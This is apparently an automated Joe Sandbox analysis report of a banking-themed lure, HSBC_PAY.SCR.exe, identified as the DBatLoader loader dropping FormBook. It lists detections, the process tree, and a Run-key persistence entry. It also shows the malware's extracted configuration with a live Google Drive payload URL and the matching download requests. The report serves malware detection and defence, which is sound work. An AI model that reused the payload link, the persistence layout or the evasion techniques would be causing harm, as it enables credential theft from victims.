Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSBC_PAY.SCR.exe

Overview

General Information

Sample name:HSBC_PAY.SCR.exe
Analysis ID:1583879
MD5:23b640cc7b2cff45ceef1c718e7095e0
SHA1:dcb684e452d59af4b1bc7b5de4bdccd2b82a967b
SHA256:bfc7a921cd679ab7d693e30c552e352a7c564a75ec7e60b25960c63ae9067938
Tags:exePaymentSCRuser-cocaman
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • HSBC_PAY.SCR.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 2304 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 4092 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Ktnfnozu.PIF (PID: 3612 cmdline: "C:\Users\Public\Libraries\Ktnfnozu.PIF" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 2004 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 3548 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Ktnfnozu.PIF (PID: 1148 cmdline: "C:\Users\Public\Libraries\Ktnfnozu.PIF" MD5: 23B640CC7B2CFF45CEEF1C718E7095E0)
    • cmd.exe (PID: 6828 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uzonfntK.pif (PID: 2844 cmdline: C:\Users\Public\Libraries\uzonfntK.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.uzonfntK.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.uzonfntK.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                14.2.uzonfntK.pif.400000.2.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  14.2.uzonfntK.pif.400000.2.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    8.2.uzonfntK.pif.400000.2.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\uzonfntK.pif, NewProcessName: C:\Users\Public\Libraries\uzonfntK.pif, OriginalFileName: C:\Users\Public\Libraries\uzonfntK.pif, ParentCommandLine: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe", ParentImage: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ParentProcessId: 6808, ParentProcessName: HSBC_PAY.SCR.exe, ProcessCommandLine: C:\Users\Public\Libraries\uzonfntK.pif, ProcessId: 4092, ProcessName: uzonfntK.pif
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ktnfnozu.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ktnfnozu
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Ktnfnozu.PIF" , ParentImage: C:\Users\Public\Libraries\Ktnfnozu.PIF, ParentProcessId: 3612, ParentProcessName: Ktnfnozu.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 2004, ProcessName: cmd.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ktnfnozu.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ktnfnozu
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine: C:\Users\Public\Libraries\uzonfntK.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\uzonfntK.pif, NewProcessName: C:\Users\Public\Libraries\uzonfntK.pif, OriginalFileName: C:\Users\Public\Libraries\uzonfntK.pif, ParentCommandLine: "C:\Users\user\Desktop\HSBC_PAY.SCR.exe", ParentImage: C:\Users\user\Desktop\HSBC_PAY.SCR.exe, ParentProcessId: 6808, ParentProcessName: HSBC_PAY.SCR.exe, ProcessCommandLine: C:\Users\Public\Libraries\uzonfntK.pif, ProcessId: 4092, ProcessName: uzonfntK.pif

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-03T20:01:56.651414+010020283713Unknown Traffic192.168.2.449731142.250.184.238443TCP
                      2025-01-03T20:01:57.752707+010020283713Unknown Traffic192.168.2.449732142.250.185.129443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: HSBC_PAY.SCR.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFAvira: detection malicious, Label: HEUR/AGEN.1325882
                      Found malware configuration
                      Source: HSBC_PAY.SCR.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFReversingLabs: Detection: 50%
                      Multi AV Scanner detection for submitted file
                      Source: HSBC_PAY.SCR.exeReversingLabs: Detection: 50%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: HSBC_PAY.SCR.exeJoe Sandbox ML: detected
                      Source: HSBC_PAY.SCR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: uzonfntK.pif, 00000003.00000003.1957883570.0000000028DF7000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000003.1954844272.0000000028C46000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.000000002913E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: uzonfntK.pif, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216B1000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.0000000021682000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02A858B4

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9E2F0 InternetCheckConnectionA,0_2_02A9E2F0
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 142.250.184.238:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.185.129:443
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
